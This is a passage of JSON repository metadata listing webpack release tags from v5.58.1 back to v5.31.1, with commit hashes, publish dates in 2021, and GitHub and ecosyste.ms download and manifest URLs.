T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p